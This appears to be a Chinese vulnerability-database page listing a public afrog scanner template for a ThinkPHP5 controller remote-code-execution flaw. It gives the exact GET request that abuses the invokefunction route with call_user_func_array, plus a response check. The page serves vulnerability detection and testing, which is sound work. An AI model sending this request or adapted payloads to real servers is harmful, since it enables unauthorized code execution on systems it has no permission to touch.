thinkphp5-controller-rce: thinkphp5-controller-rce

日期: 2025-09-01 | 影响软件: thinkphp5 | POC: 已公开

漏洞描述

thinkphp5-controller-rce

PoC代码[已公开]

id: thinkphp5-controller-rce

info:
  name: thinkphp5-controller-rce
  author: daffainfo
  severity: critical
  description: thinkphp5-controller-rce
  reference:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/5-rce

rules:
    r0:
        request:
            method: GET
            path: /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
        expression: response.body.bcontains(b"a29hbHIgaXMg%d2F0Y2hpbmcgeW9129")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/thinkphp5-controller-rce.yaml

相关漏洞推荐